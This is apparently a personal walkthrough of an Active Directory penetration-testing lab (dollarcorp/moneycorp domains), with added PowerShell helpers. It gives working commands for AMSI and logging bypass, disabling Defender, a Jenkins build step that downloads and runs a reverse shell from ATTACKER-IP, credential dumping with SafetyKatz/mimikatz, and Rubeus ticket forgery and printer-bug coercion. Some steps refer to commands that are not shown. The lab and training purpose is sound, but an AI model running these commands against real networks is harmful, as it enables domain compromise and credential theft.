You will need to turn off Tamper Protection on the student VM after getting a user shell or performing local privilege escalation (search the web for how to do this)
Sometimes you need to press the Enter key to see the output of commands like netcat, Rubeus, mimikatz etc.
If most attacks, especially the domain persistence ones, stop working, just reboot the student VM; you have probably created a lot of tickets 😭
Things to do first once you have a user
Start a PowerShell session using Invisi-Shell to avoid enhanced logging
# do this on MS-DOS (cmd.exe)
C:\Users\studentx> cd \AD\Tools
C:\AD\Tools> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# You should now have a PowerShell session
Use the AMSI Bypass payload now
Load PowerView in the PowerShell session.
. C:\AD\Tools\PowerView.ps1
Enumeration
[!bug] Learning Objective 1
Enumerate following for the dollarcorp domain :
Users
Computers
Domain Administrators
Enterprise Administrators
Shares
Solution -:
Users
# PowerView (both list users)
# The first also shows logoncount, which helps spot decoy accounts (an account that has never logged on is suspicious)
Get-DomainUser -Properties samaccountname,logonCount
Get-DomainUser | select -ExpandProperty samaccountname
Computers
# PowerView
# computer account names
Get-DomainComputer | select Name
# fully qualified host names (dnshostname), which is what winrs, PS Remoting and UNC paths need
Get-DomainComputer | select -ExpandProperty dnshostname
Domain Admins
# PowerView
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# The most important pieces of information in the output (note them down) are:
# MemberName
# MemberSID
Enterprise Admin
# PowerView
Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse
# If you get no output from the above command, remember that the Enterprise Admins group
# exists only in the root domain of the forest, so query the root domain instead:
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local
# Also note down MemberName and MemberSID
Shares
# PowerView
Invoke-ShareFinder -Verbose
# See the contents of a listed share
# e.g. dir "\\dcorp-std520.dollarcorp.moneycorp.local\ADMIN$\"
dir "\\dnshostname\sharename"
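The same enumeration done in one pass, with a decoy-account heuristic and a share read check built in. This is an added example, not code from the lab manual; it assumes PowerView.ps1 is dot-sourced in the current Invisi-Shell session and that we run as a dollarcorp user. Domain and group names are the lab's; the decoy thresholds, the description keywords and the use of Find-DomainShare (the current PowerView name behind the Invoke-ShareFinder alias) are my assumptions.

```powershell
# Added example, not part of the lab manual. Assumes PowerView is loaded and we run as a domain user.
# Domain/group names are the lab's; decoy heuristics are my own.

# --- Users: pull the attributes that separate real accounts from decoys in one LDAP query
$users = Get-DomainUser -Properties samaccountname,logoncount,lastlogon,badpwdcount,whencreated,description

function Get-LikelyDecoyUsers {
    param([object[]]$Users, [int]$MinAgeDays = 30)
    $Users | Where-Object {
        # never logged on although the account has existed for a while
        ((-not $_.logoncount) -and $_.whencreated -lt (Get-Date).AddDays(-$MinAgeDays)) -or
        # a "password" hint in the description is either a honeytoken or a real finding; flag both
        ($_.description -match 'pass|pwd')
    }
}
Get-LikelyDecoyUsers -Users $users |
    Select-Object samaccountname,logoncount,lastlogon,whencreated,description | Format-Table -AutoSize

# --- Computers: account name plus FQDN (what winrs, Enter-PSSession and UNC paths need)
Get-DomainComputer -Properties name,dnshostname,operatingsystem | Format-Table -AutoSize

# --- Privileged groups: resolve nested membership and keep name + SID for later ticket work.
# Enterprise Admins exists only in the forest root, so that one is queried against moneycorp.local.
$groups = @(
    @{ Name = 'Domain Admins';     Domain = 'dollarcorp.moneycorp.local' },
    @{ Name = 'Enterprise Admins'; Domain = 'moneycorp.local' }
)
$privileged = foreach ($g in $groups) {
    Get-DomainGroupMember -Identity $g.Name -Domain $g.Domain -Recurse |
        Select-Object @{n='Group';e={$g.Name}}, MemberName, MemberSID, MemberObjectClass
}
$privileged | Format-Table -AutoSize

# --- Shares: -CheckShareAccess keeps only shares the current user can open; drop the default ones
$standard = 'ADMIN$','C$','IPC$','print$','NETLOGON','SYSVOL'
Find-DomainShare -CheckShareAccess | Where-Object { $standard -notcontains $_.Name } | ForEach-Object {
    $unc = "\\$($_.ComputerName)\$($_.Name)"
    try   { Get-ChildItem -Path $unc -ErrorAction Stop | Select-Object -First 5 -ExpandProperty FullName }
    catch { Write-Warning "Listed but not readable: $unc" }
}
```

Note down MemberName and MemberSID from the privileged-group table: the SIDs are reused later for Golden, Diamond and inter-realm tickets. The decoy filter is only a hint; treat a flagged account as something to avoid touching until you know what it is.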
[!bug] Learning Objective 2
Enumerate following for the dollarcorp domain
List all the OUs
List all the computers in the StudentMachines OU.
List all the GPOs
Enumerate GPO applied on the StudentMachines OU
Solution -:
List All Organizational Units
# PowerView
Get-DomainOU
# Use the -Properties option to show just the name
Get-DomainOU -Properties Name
List all the computers in the StudentMachines OU (works for any OU)
# PowerView
# Get the OU name first
Get-DomainOU -Properties Name
# Then list all computers under that OU by using its distinguished name as the search base
(Get-DomainOU -Identity <OU_Name>).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
List all the GPOs
# PowerView
Get-DomainGPO
Enumerate GPO applied on the StudentMachines OU
# PowerView
# Get the OU name first
Get-DomainOU -Properties Name
# Get the object for the specific OU
Get-DomainOU -Identity StudentMachines
# Copy the GUID from the "gplink" property, which looks like "[LDAP://cn={Copy-This},cn=policies,cn=system,DC=...;0]"
# Get the GPO that is linked
Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-9E4618BC785D}'
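Instead of copying the GUID by hand, the gplink attribute can be parsed and each link resolved to its GPO, including the enforced/disabled flag that the manual copy loses. This is an added example, not from the lab manual; it assumes PowerView is loaded. The OU name is the lab's, the function works for any OU.

```powershell
# Added example, not part of the lab manual. Assumes PowerView is loaded.
function Get-OUComputersAndGPOs {
    param([Parameter(Mandatory)][string]$OUName)

    $ou = Get-DomainOU -Identity $OUName
    if (-not $ou) { throw "OU '$OUName' not found" }

    # Computers under the OU (and its child OUs): search with the OU's DN as the base
    $computers = Get-DomainComputer -SearchBase $ou.distinguishedname | Select-Object -ExpandProperty name

    # gplink is a string such as "[LDAP://cn={GUID},cn=policies,cn=system,DC=...;0][LDAP://...;2]".
    # Each entry is a GPO DN followed by ;flags where bit 0 = link disabled and bit 1 = enforced.
    $links = [regex]::Matches([string]$ou.gplink, '\[LDAP://(?<dn>[^;]+);(?<flags>\d)\]')
    $gpos = foreach ($m in $links) {
        $dn    = $m.Groups['dn'].Value
        $flags = [int]$m.Groups['flags'].Value
        $gpo   = Get-DomainGPO -Identity $dn          # Identity accepts a DN as well as a GUID
        [pscustomobject]@{
            DisplayName = $gpo.displayname
            Guid        = $gpo.name
            Enforced    = [bool]($flags -band 2)
            Disabled    = [bool]($flags -band 1)
            Path        = $gpo.gpcfilesyspath           # SYSVOL folder, readable by any domain user
        }
    }
    [pscustomobject]@{ OU = $ou.distinguishedname; Computers = $computers; GPOs = $gpos }
}

$r = Get-OUComputersAndGPOs -OUName 'StudentMachines'
$r.Computers
$r.GPOs | Format-Table -AutoSize
```

The Path column is worth keeping: the GPO's SYSVOL folder holds the actual policy files (scripts, registry settings, local group changes), which is where the "what does this GPO do to my machine" question gets answered.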
Enumerate all domains in the moneycorp.local forest.
Map the trusts of the dollarcorp.moneycorp.local domain.
Map external trust in the moneycorp.local forest.
Identify external trusts of dollarcorp domain. Can you enumerate trusts for a trusting forest ?
Solution -:
Get all domains in the current forest
Get-ForestDomain -Verbose
# The "Name:" property holds the domain names
# Or just filter by Name
Get-ForestDomain -Verbose | select Name
Map the trusts of all domains
# PowerView
Get-DomainTrust
# Map the trusts of a specific domain (take the names from Get-ForestDomain)
Get-ForestDomain -Verbose | select Name
Get-DomainTrust -Domain us.dollarcorp.moneycorp.local
# Output you should look out for:
# SourceName
# TargetName
# TrustAttributes
# TrustDirection
Trust direction for the trust between dollarcorp.moneycorp.local and eurocorp.local
# Enumerating the domains of a trusting forest only works when the trust lets our account
# authenticate to it: a bidirectional trust, or a one-way trust in which eurocorp.local trusts dollarcorp.
# In that case we can run:
Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}
The way I understood this is pretty much: "ok, we're in the domain dollarcorp.moneycorp.local, we target eurocorp.local and ask for the trust direction."
We could've seen it with a simple Get-DomainTrust
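A breadth-first walk that follows every trust once and classifies it, so the whole reachable map comes out in one table rather than from several hand-typed Get-DomainTrust calls. This is an added example, not from the lab manual; it assumes PowerView is loaded. Only the starting domain name is the lab's.

```powershell
# Added example, not part of the lab manual. Assumes PowerView is loaded.
# Queries to a trusting domain only succeed when its trust direction lets our account authenticate there.
function Get-TrustMap {
    param([string]$StartDomain = 'dollarcorp.moneycorp.local')

    $seen  = New-Object System.Collections.Generic.HashSet[string]
    $queue = New-Object System.Collections.Generic.Queue[string]
    $queue.Enqueue($StartDomain)
    $results = @()

    while ($queue.Count -gt 0) {
        $d = $queue.Dequeue()
        if (-not $seen.Add($d.ToLower())) { continue }      # already mapped
        try {
            $trusts = Get-DomainTrust -Domain $d -ErrorAction Stop
        } catch {
            Write-Warning "Cannot enumerate $d (no network path or no rights): $_"
            continue
        }
        foreach ($t in $trusts) {
            $results += [pscustomobject]@{
                Source     = $t.SourceName
                Target     = $t.TargetName
                Direction  = $t.TrustDirection             # Inbound / Outbound / Bidirectional
                Attributes = $t.TrustAttributes
                # parent/child trusts are transitive inside the forest; forest trusts are transitive
                # between the two roots; external trusts are not transitive at all
                Kind = if ($t.TrustAttributes -match 'WITHIN_FOREST') { 'intra-forest' }
                       elseif ($t.TrustAttributes -match 'FOREST_TRANSITIVE') { 'forest' }
                       else { 'external' }
            }
            $queue.Enqueue($t.TargetName)                    # follow the trust; dedup happens above
        }
    }
    $results
}

Get-TrustMap | Sort-Object Source, Target | Format-Table -AutoSize
```

This is essentially what PowerView's own Get-DomainTrustMapping does; writing it out shows why a warning for a given domain is itself a finding: it tells you the trust direction does not let you in from where you are, so that forest has to be reached from another foothold.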
Local Privilege Escalation
[!bug] Learning Objective 5
Exploit a service on dcorp-studentx and elevate privileges to local administrator.
Identify a machine in the domain where studentx has local administrative access.
Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the dcorp-ci server
Solution -:
Get services with unquoted paths and a space in their name (exploit)
Cd to C:\AD\Tools
Load Invisi-shell
Load AMSI Bypass
Load Powerup.ps1 script
. 'C:\AD\Tools\PowerUp.ps1'
Run the Get-ServiceUnquoted module to check for unquoted path
What is an Unquoted Service Path?
In Windows, a service is started from the executable given in its binary path, and that path sometimes contains spaces. If the path is not enclosed in quotes, the service control manager cannot tell where the executable name ends and the arguments begin. For example, consider the service path:
C:\Program Files\Some Service\service.exe
If it is not quoted, Windows tries C:\Program.exe first, then C:\Program Files\Some.exe, and only then the intended binary. If a low-privileged user can write to one of those directories, dropping a binary with the right name gets it executed with the service's privileges (often SYSTEM) the next time the service starts.
Invoke-AllChecks
# Note down the "ServiceName:" entries with unquoted paths (and the modifiable services further down in the output)
Exactly the spaces that were mentioned above. But what I did not understand immediately is that it's not that we're aiming for; we're going to look at this one ->
Then abuse the service with Invoke-ServiceAbuse to add our current domain user to the local Administrators group.
Invoke-ServiceAbuse works on a service whose configuration our user can modify: it temporarily points the service's binary path at a command that adds a user called dcorp\student613 to the local Administrators group, restarts the service so the command runs with the service's privileges, and then restores the original path:
# -Name: name of the service to abuse
# -UserName: name of the current user, run whoami to get it
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose
We can see that dcorp\studentx is a local administrator now. Just log off and log on again and the new token has local administrator privileges!
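What Get-ServiceUnquoted checks, written out so the actual hijack points and the write test are visible. This is an added example, not from the lab manual or PowerUp; it uses only built-in cmdlets, runs on any Windows host and assumes nothing about the lab.

```powershell
# Added example, not part of the lab manual. No lab-specific names; runs as the current (unprivileged) user.
function Get-UnquotedServiceHijackPoints {
    Get-CimInstance Win32_Service | ForEach-Object {
        $path = $_.PathName
        # Skip empty paths, quoted paths and anything that is not an .exe
        if (-not $path -or $path.StartsWith('"') -or $path -notmatch '\.exe') { return }
        $exe = ($path -split '\.exe', 2)[0] + '.exe'     # drop service arguments
        if ($exe -notmatch ' ') { return }               # no space, no ambiguity

        # Windows tries each prefix cut at a space: C:\Program.exe, C:\Program Files\Some.exe, ...
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i-1)] -join ' ') + '.exe'
            $dir = Split-Path $candidate -Parent
            if (-not (Test-Path $dir)) { continue }
            # Can the current user create a file there? Try it, then clean up.
            $writable = $false
            $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
            try { [IO.File]::WriteAllText($probe, ''); Remove-Item $probe -Force; $writable = $true } catch {}
            [pscustomobject]@{
                Service   = $_.Name
                StartName = $_.StartName       # account the hijacked binary would run as
                StartMode = $_.StartMode       # Auto = runs at boot, i.e. no restart rights needed
                Path      = $exe
                HijackExe = $candidate
                Writable  = $writable
            }
        }
    }
}

# Only rows with Writable = True are exploitable. The fix is to quote the path, e.g.
#   sc.exe config <service> binPath= "\"C:\Program Files\Some Service\service.exe\""
Get-UnquotedServiceHijackPoints | Where-Object Writable | Format-Table -AutoSize
```

StartMode matters as much as Writable: with an Auto-start service you do not need the right to restart it, a reboot (or the next boot) runs your binary; a Manual service additionally needs SERVICE_START rights or an administrator who restarts it.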
Identify a machine in the domain where present user has local administrative access
Cd to C:\AD\Tools
Load Invisi-shell
Load AMSI Bypass
Load Find-PSRemotingLocalAdminAccess.ps1 script
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find local administrative access
Find-PSRemotingLocalAdminAccess
We can then connect to the machines found using winrs or Enter-PSSession (PowerShell Remoting)
Navigate to the Jenkins instance http://172.16.3.11:8080
Log in with default credentials, in this case build:build, or look up the default Jenkins credentials
Turn off all Windows Firewall profiles on the student VM so that dcorp-ci can reach HFS and the listener
Start up hfs.exe (HTTP File Server) located under C:\AD\Tools\
Navigate to /job/Project0/configure (If you get a 403 keep changing Project0 to Project1, Pro...2, ..........3 till you get a 200)
Scroll down to "Build steps", select "Execute Windows batch command" from the drop-down and enter:
powershell iex (iwr -UseBasicParsing http://ATTACKER-IP/Invoke-PowerShellTcp.ps1);power -Reverse -IPAddress ATTACKER-IP -Port 443
# Replace ATTACKER-IP with your IP address (run ipconfig to see it)
Start up your listener with netcat.exe
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
Hit Apply and then Save; in the left sidebar you should see a Build Now button, click it.
You should then see your reverse shell on the listener, running on dcorp-ci as the Jenkins user (ciadmin)
Enumeration - Bloodhound
[!bug] Learning Objective 6
Setup BloodHound and identify shortest path to Domain Admins in the dollarcorp domain.
Solution -:
The reason this enumeration comes after local privilege escalation is that parts of the collection (logged-on user enumeration in particular) need administrative rights on the hosts being queried
BloodHound New Setup
BloodHound uses the neo4j graph database, so we need to set that up first.
Open this location in MS-DOS
cd C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin
Install and start the neo4j service as follows:
.\neo4j.bat install-service
.\neo4j.bat start
Browse to the neo4j service on http://localhost:7474/browser/ in your browser
Enter the username: neo4j and password: neo4j.
You also need to enter a new password. Let's use BloodHound as the new password.
We also need to start BloodHound; change directory and launch it:
cd C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64
.\BloodHound.exe
Provide the neo4j username and the password we created earlier
You should have the collector's zip file; drag and drop it onto the BloodHound UI
BloodHound Old Setup
The latest version of BloodHound (4.2.0) does not show the Derivative Local Admin edge in the GUI. The last version where it worked was 4.0.3. It is present in the Tools directory as BloodHound-4.0.3_old. You can use it the same way as above.
Make sure neo4j is still running; you can close the newer BloodHound
Change directory to the old BloodHound using MS-DOS and start it up
cd C:\AD\Tools\BloodHound-4.0.3_old\BloodHound-win32-x64
.\BloodHound.exe
Now that we have local administrator privileges, turn off antivirus (both Real-time protection and Tamper Protection) using the GUI
Open another PowerShell session with local administrative privileges and load Invisi-Shell
Shortest path to Domain Admins in the dollarcorp domain - bloodhound
Note -: This can only be done with the old BloodHound UI
In Node Info, scroll down to 'LOCAL ADMIN RIGHTS' and expand 'Derivative Local Admin Rights' to find out if studentx has derivative local admin rights on any machine!
As we can see below, student505 is a member of the RDPUSERS group and RDPUSERS has admin rights on DCORP-ADMINSRV
This means that running winrs -r:dcorp-adminsrv cmd gives us a shell with local administrator rights on dcorp-adminsrv (not Domain Admin yet; that host is where we harvest more credentials)
Lateral Movement - 1. Using dcorp-ci
[!bug] Learning Objective 7
Identify a machine in the target domain where a Domain Admin session is available.
Compromise the machine and escalate privileges to Domain Admin
Using access to dcorp-ci
Using derivative local admin
Solution -:
Step 1 - Identify a machine in the target domain where a Domain Admin session is available.
Remember we got access to dcorp\ciadmin via the Jenkins instance; we can use this domain user to enumerate where a Domain Admin session is available. Go ahead and get a reverse shell with Jenkins again ☹️
First, we must bypass AMSI and enhanced logging.
The command below bypasses Enhanced Script Block Logging
Make sure to setup HFS and host the sbloggingbypass.txt for this
Then run this command to find domain admin session
Note that this can take a long time, so wait!! 🤣
Find-DomainUserLocation
Find-DomainUserLocation queries every computer in the domain for SMB sessions (NetSessionEnum) and logged-on users (NetWkstaUserEnum) and reports the hosts where a member of a target group, by default Domain Admins, is present. With -CheckAccess it also tests whether the current user has local admin rights there. This is how we find the machine whose LSASS holds a Domain Admin's credentials.
Great! There is a domain admin session on dcorp-mgmt server
Note -: If you don't get result within 4 minutes hit the Enter key on your keyboard twice you should see output, hence, keep waiting till something comes up
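The core of Find-DomainUserLocation written out, so it is clear which API each step uses and why a plain domain user sees sessions but usually not logged-on users. This is an added example, not from the lab manual; it assumes PowerView is loaded and the session runs as a domain user. Group and domain names are the lab's.

```powershell
# Added example, not part of the lab manual. Assumes PowerView is loaded; runs as a domain user.
function Find-PrivilegedSessions {
    param(
        [string]$Group  = 'Domain Admins',
        [string]$Domain = 'dollarcorp.moneycorp.local'
    )
    # 1. The accounts we are hunting (nested groups resolved)
    $targets = Get-DomainGroupMember -Identity $Group -Domain $Domain -Recurse |
               Where-Object MemberObjectClass -eq 'user' |
               Select-Object -ExpandProperty MemberName
    $targetSet = [System.Collections.Generic.HashSet[string]]::new([StringComparer]::OrdinalIgnoreCase)
    $targets | ForEach-Object { [void]$targetSet.Add($_) }

    # 2. Every computer in the domain, by FQDN
    $hosts = Get-DomainComputer -Domain $Domain -Properties dnshostname | Select-Object -ExpandProperty dnshostname

    foreach ($h in $hosts) {
        # NetSessionEnum lists SMB sessions *to* this host; any authenticated user may call it
        # (until the Windows 10 1709 / Server 2019 hardening). UserName is the connecting account.
        $sessions = Get-NetSession -ComputerName $h -ErrorAction SilentlyContinue |
                    Where-Object { $targetSet.Contains($_.UserName) }
        # NetWkstaUserEnum lists interactive/service logons *on* this host; it needs local admin,
        # so for a plain user it silently returns nothing on most hosts.
        $logons   = Get-NetLoggedon -ComputerName $h -ErrorAction SilentlyContinue |
                    Where-Object { $targetSet.Contains($_.UserName) }

        foreach ($s in $sessions) {
            [pscustomobject]@{ Computer = $h; User = $s.UserName; Source = 'Session';  From = $s.CName }
        }
        foreach ($l in $logons) {
            [pscustomobject]@{ Computer = $h; User = $l.UserName; Source = 'LoggedOn'; From = $l.LogonDomain }
        }
    }
}

# A row with a DA user is the host to target next (dcorp-mgmt in the lab)
Find-PrivilegedSessions | Format-Table -AutoSize
```

A Session row tells you the DA connected to that host over SMB from the machine in the From column, so the credentials may be on either end; a LoggedOn row is the stronger signal, since the account has a logon session on that host itself.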
Step 2 - Abuse using winrs
Let’s check if we can execute commands on dcorp-mgmt server and if the winrm port is open:
winrs -r:dcorp-mgmt hostname;whoami
Once this is confirmed we can run SafetyKatz.exe on dcorp-mgmt to extract credentials from it:
Download Loader.exe to dcorp-ci and copy it from there to dcorp-mgmt
We get the credentials of svcadmin, a domain administrator. Note that svcadmin is used as a service account, so its password can also be obtained in clear text from the LSA secrets!
Incase you want to use Powershell Remoting instead of winrs, you can check out lab manual
Step 3 - OverPass-the-Hash Rubeus
We will use OverPass-the-Hash to use svcadmin's credentials
Spawn an elevated shell from the student VM (Run as Administrator)
We have an interesting policy in \Script that allows everyone to run programs, signed binaries and scripts located under "C:\Program Files". That means we can drop scripts in the Program Files directory there and execute them.
First, disable Windows Defender on the dcorp-adminsrv server
Before this, exit the winrs session and use PS Remoting
Enter-PSSession dcorp-adminsrv
# Disable windows defender
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Example
Step 1 - Create Invoke-MimiEx.ps1
Create a copy of Invoke-Mimi.ps1 and rename it to Invoke-MimiEx.ps1.
Open Invoke-MimiEx.ps1 in PowerShell ISE (Right click on it and click Edit).
Add Invoke-Mimi -Command '"sekurlsa::ekeys"' to the end of the file.
Example
Open a new PowerShell session on the student machine and run the following command to transfer Invoke-MimiEx.ps1 to dcorp-adminsrv
From the new process, copy Loader.exe to dcorp-dc and use it to extract credentials
# Copy Loader.exe to DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# Spawn interactive shell
winrs -r:dcorp-dc cmd
# Set up port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x
# Extract Credentials
# make sure to setup HFS first and host SafetyKatz.exe
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
# Run this command on the mimikatz session
lsadump::lsa /patch
# Take note of the "Domain :" output
# This is the domain SID, which will be needed often
Example
Using the secrets of krbtgt account, create a Golden ticket.
To get the NTLM hash and AES keys of the krbtgt (or any other) account, we can use the DCSync attack
Run the command below from a process running as Domain Admin
Then run the command below to check that the ticket gives you access; listing the scheduled tasks on the DC requires administrative rights there
exit
schtasks /S dcorp-dc.dollarcorp.moneycorp.local
<<Expected Output>>
[SNIP]
TaskName Next Run Time Status
============================= ====== ===============
Device Install Group Policy N/A Ready
Device Install Reboot Required N/A Ready
Sysprep Generalize Drivers N/A Ready
Folder: \Microsoft\Windows\Power Efficiency Diagnostics
TaskName Next Run Time Status
===================== ============== ===============
AnalyzeSystem N/A Ready
Folder: \Microsoft\Windows\PushToInstall
TaskName Next Run Time Status
============= ====================== ===============
LoginCheck N/A Disabled
Registration N/A Disabled
Folder: \Microsoft\Windows\Ras
TaskName Next Run Time Status
============= ====================== ===============
MobilityManager N/A Ready
[SNIP]
Note that if you get "Error: Access is denied", the ticket was probably forged or injected incorrectly
Step 2 - Gain Reverse Shell
Now host the newly created Invoke-PowerShellTcpEx.ps1 on HFS
Start up your reverse shell on another new MS-DOS session
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
On the same session where we created our silver ticket run this
Check that the tickets are present; desired output:
klist
Now, try running WMI commands on the domain controller:
# Spawn invisi-shell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Run command on DC
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
Example
Executing the Diamond Ticket attack.
[!bug] Learning Objective 10
Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack.
Solution -:
We can simply use the following Rubeus command to execute the attack. Note that the command needs to be run from an elevated shell (Run as administrator):
C:\AD\Tools\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
# krbkey is the krbtgt account's aes256_hmac key
# You can use the DCSync attack to get it
# check the golden ticket section to see how
Access the DC using winrs from the new spawned process!
winrs -r:dcorp-dc cmd
Example
Abusing the DSRM credential for persistence.
[!bug] Learning Objective 11
During additional lab time:
Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.
Solution -:
Note that we need Domain Admin privileges for this, so spawn an elevated shell and run this to obtain a new MS-DOS session with domain admin privileges:
Sweet! Now the command below (or any similar tool) can be used as studentx to get the hashes of the krbtgt user or any other user (run from an elevated command prompt)
Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.
Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI.
Solution -:
PowerShell Remoting and WMI Access via Security Descriptor Modification on dcorp-dc
Once we have administrative privileges on a machine, we can modify the security descriptors of its remoting endpoints so that a chosen principal can use them without being an administrator. The command below (run as Domain Administrator) modifies the host security descriptor for WMI on the DC to allow studentx access to WMI
You should now have the hashes written to C:\AD\Tools\hashes.txt. We can use John the Ripper to crack them. Note that you need to remove ":1433" from the SPN in hashes.txt before running John
We can then run the command below after making the above changes:
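An audit of the two descriptors this persistence touches, the WMI namespace DACLs and the PowerShell Remoting endpoint permissions, so the change can be confirmed after the fact and, from the defender's chair, spotted. This is an added example, not from the lab manual; it assumes the session holds administrative rights on the target (the DC's name is the lab's) and uses only built-in cmdlets.

```powershell
# Added example, not part of the lab manual. Needs admin rights on the target; host name is the lab's.
function Get-RemoteAccessDescriptors {
    param([string]$ComputerName = 'dcorp-dc')

    # --- WMI namespace DACLs; these bits are the WBEM_* access-mask values
    $wmiRights = @{ 0x1='EnableAccount'; 0x2='ExecuteMethods'; 0x4='FullWrite'; 0x8='PartialWrite';
                    0x10='ProviderWrite'; 0x20='RemoteEnable'; 0x20000='ReadSecurity'; 0x40000='EditSecurity' }
    foreach ($ns in 'root', 'root\cimv2') {
        $sd = (Invoke-WmiMethod -ComputerName $ComputerName -Namespace $ns -Path '__systemsecurity=@' `
                                -Name GetSecurityDescriptor).Descriptor
        foreach ($ace in $sd.DACL) {
            $rights = ($wmiRights.Keys | Where-Object { $ace.AccessMask -band $_ } |
                       ForEach-Object { $wmiRights[$_] }) -join ','
            [pscustomobject]@{
                Kind    = "WMI $ns"
                Trustee = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
                SID     = $ace.Trustee.SIDString
                AceType = if ($ace.AceType -eq 0) { 'Allow' } else { 'Deny' }
                Rights  = $rights
            }
        }
    }

    # --- PowerShell Remoting endpoints; Permission is the endpoint's SDDL rendered as text
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        Get-PSSessionConfiguration | ForEach-Object {
            [pscustomobject]@{ Kind = 'PSRemoting'; Trustee = $_.Name; SID = ''; AceType = ''; Rights = $_.Permission }
        }
    } | Select-Object Kind, Trustee, SID, AceType, Rights
}

# A non-admin principal (for example dcorp\studentx) with RemoteEnable+ExecuteMethods on root\cimv2,
# or listed with AccessAllowed on the Microsoft.PowerShell endpoint, is the footprint of this persistence.
Get-RemoteAccessDescriptors | Format-Table -AutoSize -Wrap
```

Default WMI DACLs only list BUILTIN\Administrators, NT AUTHORITY\NETWORK SERVICE, LOCAL SERVICE and Authenticated Users (the latter without RemoteEnable), so any other trustee, or Authenticated Users gaining RemoteEnable, is the line to look at.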
Find a server in the dcorp domain where Unconstrained Delegation is enabled.
Compromise the server and escalate to Domain Admin privileges.
Escalate to Enterprise Admins privileges by abusing Printer Bug!
Solution -:
Locate dcorp Domain Server with Unconstrained Delegation Enabled.
Find server with unconstrained delegation
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1
Get-DomainComputer -Unconstrained | select -ExpandProperty name
Since the prerequisite for elevation using Unconstrained Delegation is having admin access to the machine, we need to compromise a user which has local admin access on appsrv. Recall that we extracted the secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let's check if any of them has local admin privileges on dcorp-appsrv.
First, we will try with appadmin. Run the below command from an elevated command prompt -:
On the Rubeus listener, we can see the TGT of dcorp-dc$ (Output):
# Important Output
# User :
# Base64EncodedTicket :
[*] Monitoring every 5 seconds for new TGTs
[*] 12/18/2023 9:34:26 PM UTC - Found new TGT:
User : DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 12/18/2023 5:51:15 AM
EndTime : 12/18/2023 3:51:15 PM
RenewTill : 12/24/2023 8:17:13 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
[SNIP]
[*] Ticket cache size: 1
Copy the base64 encoded ticket and use Rubeus on the student VM to inject it, then run the SafetyKatz DCSync command (run the command below from an elevated prompt):
# C:\AD\Tools\Rubeus.exe ptt /ticket:<Base64EncodedTicket>
# Example -:
C:\AD\Tools\Rubeus.exe ptt /ticket:[SNIP]
To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the below command to listen for mcorp-dc$ tickets on dcorp-appsrv:
Note -: In case you get "access is denied", you are probably running in the wrong shell, so terminate the Rubeus listener created earlier and run it in that process
Use MS-RPRN on the student VM to trigger authentication from mcorp-dc to dcorp-appsrv:
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
# Expected Output -
RpcRemoteFindFirstPrinterChangeNotificationEx failed. Error Code 1722 - The RPC server is unavailable.
# This error is expected: by the time the call fails, mcorp-dc has already authenticated to dcorp-appsrv
Now check your Rubeus output and you should see the Base64EncodedTicket
Use Rubeus with the base64 encoded ticket on the student VM to run the elevated SafetyKatz DCSync command (run the command below from an elevated shell)
# C:\AD\Tools\Rubeus.exe ptt /ticket:<Base64EncodedTicket>
# Example -:
C:\AD\Tools\Rubeus.exe ptt /ticket:[SNIP]
Now, we can run the DCSync attack from this process:
[!todo] The TRUSTED_TO_AUTH_FOR_DELEGATION flag must also be set in the "useraccountcontrol :" property (protocol transition); without it S4U2Self cannot be used to impersonate an arbitrary user
[!info] We already have secrets of websvc from dcorp-adminsrv machine (Check On your bookmarks to see how to do that). We can either use Kekeo or Rubeus to abuse that.
Abuse Constrained Delegation using websvc with Rubeus
Request a TGS for 'websvc' as Domain Administrator ('Administrator') and use it to access the file system on dcorp-mssql
